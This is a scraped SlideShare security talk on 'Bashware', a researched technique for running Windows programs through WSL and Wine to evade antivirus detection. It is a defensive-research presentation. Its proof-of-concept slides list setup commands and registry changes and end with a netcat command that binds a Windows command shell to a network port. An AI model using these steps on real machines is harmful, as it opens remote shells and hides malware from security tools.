Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.
Bashware
A malware execution technique
/usr/bin/who
• null and OWASP Bangalore chapter leader
• A decade of security experience in various technologies
• Securit...
What is Bashware?
• A technique researched by Check Point Security that can be used by
malware to run using the Windows Su...
Back to Basics
• How does malware (pick any) infect a Windows machine?
• How is it detected? Any examples of detection tec...
An overview of WSL
• WSL is a collection of components that enables native Linux ELF64
binaries to run on Windows. It cont...
Demo of WSL
Bashware Video Demo
• https://www.youtube.com/watch?v=fwEQFMbHIV8
Let’s build a PoC!
According to the video/blogpost
• Enable WSL
• Enable Developer mode
• Install Linux components
• Install WineHQ
• Run Win...
Step 1: Enable WSL
dism /Online /Enable-Feature /All /FeatureName:Microsoft-
Windows-Subsystem-Linux /NoRestart
Enable-Win...
Step 2: Enable Developer mode
• Set the following registry values
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersio...
Step 3: Install Linux components
• lxrun /install /y
Step 4: Install Wine
dpkg --add-architecture i386
add-apt-repository -y ppa:ubuntu-wine/ppa
apt-get update
apt-get install...
Step 5: Run PE binary using wine
wine64 nc64.exe -lvp 1337 -e cmd
Demo
• Riyaz Walikar
• https://ibreak.software
• @riyazwalikar | @wincmdfu
References
• https://research.checkpoint.com/beware-bashware-new-method-
malware-bypass-security-solutions/
• https://www....
Executing Windows Malware through WSL (Bashware)
Prochain SlideShare
Chargement dans…5
×

Executing Windows Malware through WSL (Bashware)

419 vues

Publié le

A quick talk on executing Windows binaries using Wine in WSL. This allows for a sort of hidden process execution.

Publié dans : Logiciels
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

Executing Windows Malware through WSL (Bashware)

  1. 1. Bashware A malware execution technique
  2. 2. /usr/bin/who • null and OWASP Bangalore chapter leader • A decade of security experience in various technologies • Security researcher and evangelist • Speaker and trainer at several security conferences • https://ibreak.software • @riyazwalikar | @wincmdfu
  3. 3. What is Bashware? • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.) • Basically a way to run PE executables using the WSL • Bash + (mal)ware
  4. 4. Back to Basics • How does malware (pick any) infect a Windows machine? • How is it detected? Any examples of detection techniques?
  5. 5. An overview of WSL • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of: • User mode session manager service that handles the Linux instance life cycle • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
  6. 6. Demo of WSL
  7. 7. Bashware Video Demo • https://www.youtube.com/watch?v=fwEQFMbHIV8
  8. 8. Let’s build a PoC!
  9. 9. According to the video/blogpost • Enable WSL • Enable Developer mode • Install Linux components • Install WineHQ • Run Windows binary through Wine
  10. 10. Step 1: Enable WSL dism /Online /Enable-Feature /All /FeatureName:Microsoft- Windows-Subsystem-Linux /NoRestart Enable-WindowsOptionalFeature -O -F Microsoft-Windows- Subsystem-Linux
  11. 11. Step 2: Enable Developer mode • Set the following registry values [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock] "AllowAllTrustedApps"=dword:1 "AllowDevelopmentWithoutDevLicense"=dword:1
  12. 12. Step 3: Install Linux components • lxrun /install /y
  13. 13. Step 4: Install Wine dpkg --add-architecture i386 add-apt-repository -y ppa:ubuntu-wine/ppa apt-get update apt-get install wine1.6-amd64
  14. 14. Step 5: Run PE binary using wine wine64 nc64.exe -lvp 1337 -e cmd
  15. 15. Demo
  16. 16. • Riyaz Walikar • https://ibreak.software • @riyazwalikar | @wincmdfu
  17. 17. References • https://research.checkpoint.com/beware-bashware-new-method- malware-bypass-security-solutions/ • https://www.youtube.com/watch?v=fwEQFMbHIV8 • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows- subsystem-for-linux-overview/ • https://ibreak.software/executing-windows-malware-in-windows- subsystem-for-linux-bashware/

×